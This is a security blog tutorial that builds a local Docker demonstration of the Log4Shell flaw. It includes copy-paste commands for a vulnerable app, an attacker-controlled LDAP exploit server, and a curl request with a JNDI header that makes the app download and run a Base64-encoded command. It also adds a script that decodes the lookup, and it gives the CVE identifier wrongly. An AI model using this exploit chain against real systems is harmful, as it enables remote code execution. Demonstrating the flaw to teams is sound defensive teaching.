
How to Build Your Own Log4Shell Demo (CVE-2021-4428)

Our simple explainer of the Log4Shell (CVE-2021-4428) exploit has quickly become our most popular blog post. People really resonated with the cup of coffee analogy and we've had great feedback on the quick demonstration video.


We've had many requests on how to build your own Log4Shell demo to show internal teams. If you watch our video, it's clear you need two things: a vulnerable application and a working LDAP server under your control to deliver the exploit.


The common way to do this is to set up a demonstration in a virtual machine. However, virtual machines take up huge resources and are hard to share, so let's use Docker for both systems.


The first half - the vulnerable application - is already available as a Docker container.

The second half - the LDAP server - isn't, so we spent some time this morning creating one just for you! The reason we have created this container is that the original exploit has been removed and is no longer available for demonstrating the vulnerability.


For your demonstration to work you obviously need Docker running on your system. If you don't already have it, please install it now or the rest won't work. The second thing we need to do is set up a separate Docker network so the two containers can see and talk to each other. I suggest that you have three terminal screens open: one for the application (the Application Terminal), one for the LDAP server (the LDAP Terminal) and one for running other commands, which we shall refer to as the Command Terminal.


Copy and Paste Instructions for the Entire Demo


First, let's set up the Docker network for the demo, in the Command Terminal:


docker network create log4jnetwork

Now, let's grab and run the vulnerable application in the Application Terminal:


docker run --rm --network log4jnetwork --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Next, run the 'ls' command in the Command Terminal on the /tmp directory of the vulnerable app. This will show us the 3 files that are in there:


docker exec vulnerable-app ls /tmp

We now need an LDAP server that is under our control and listens on two ports: 1389 and 8888. This command will grab our version of the exploit, running on an Alpine Linux based image with a Java JRE built in. Run this in the LDAP Terminal:


docker run --rm --network log4jnetwork --name log4jldapserver -p 1389:1389 -p 8888:8888 cygenta/log4jldap

Finally, we get to trigger the exploit using the command below. The request is sent to the vulnerable app, which then performs the lookup and downloads the exploit from the LDAP server. The exploit in this case creates a file in the /tmp folder. Run this in the Command Terminal, or in a separate new terminal to simulate another machine:


curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://log4jldapserver:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9DeWdlbnRhRGVtbw==}'

And we obviously need to finish by looking back at the vulnerable app server to see if we managed to create the file in the /tmp folder. Again, run this in the Command Terminal:


docker exec vulnerable-app ls /tmp
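
To show your audience what the header in the curl command above actually asks the application to do, this added example (not part of the original post or of either container) pulls the JNDI lookup out of a request line, splits it into scheme, host, port and path, and decodes the Base64 segment. The function names are hypothetical, and reading the last path segment as the Base64-encoded command is an assumption based on the URL used in this post.

```shell
#!/bin/sh
# Added example: dissect a JNDI lookup string found in a request or log line.
# Function names are hypothetical; they do not come from Log4j or the containers.

# Print the first ${jndi:...} lookup in the text; non-zero status if none.
extract_lookup() {
    printf '%s\n' "$1" | grep -o '\${jndi:[^}]*}' | head -n 1 | grep .
}

# Print "scheme host port path" for a lookup like ${jndi:ldap://host:1389/a/b}.
parse_lookup() {
    prefix='${jndi:'; suffix='}'
    body=${1#"$prefix"}; body=${body%"$suffix"}
    scheme=${body%%://*}
    rest=${body#*://}
    authority=${rest%%/*}
    path=${rest#*/}
    host=${authority%%:*}
    port=${authority##*:}
    if [ "$port" = "$authority" ]; then port=default; fi
    printf '%s %s %s %s\n' "$scheme" "$host" "$port" "$path"
}

# Assumption: in the Basic/Command/Base64/<data> path used in this post, <data>
# is the Base64-encoded command. Print it decoded; fail for any other path.
decode_command() {
    case $1 in
        Basic/Command/Base64/*)
            printf '%s' "${1#Basic/Command/Base64/}" | base64 -d ;;
        *) return 1 ;;
    esac
}

# Summarise what a request line would make a vulnerable logger do.
report() {
    lookup=$(extract_lookup "$1") || { echo "no JNDI lookup found"; return 1; }
    set -- $(parse_lookup "$lookup")
    echo "callout: $1 connection to host $2, port $3"
    if cmd=$(decode_command "$4"); then echo "command: $cmd"; fi
}

# Constructed sample: the header sent by the curl command in this post.
SAMPLE='X-Api-Version: ${jndi:ldap://log4jldapserver:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9DeWdlbnRhRGVtbw==}'
report "$SAMPLE"
```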

Watch my quick video walkthrough of the above steps:





One thing to check if you have any issues: please make sure that the names of containers and networks match.


In case you missed it, our original exploit demo video is here:




We would like to thank:

and https://twitter.com/DeathsPirate/ for user testing.



4 Comments


Siwar Tlili
Feb 18, 2023

I followed all the steps above successfully but I haven't been able to exploit the vulnerability with Metasploit! Is there any missing step?
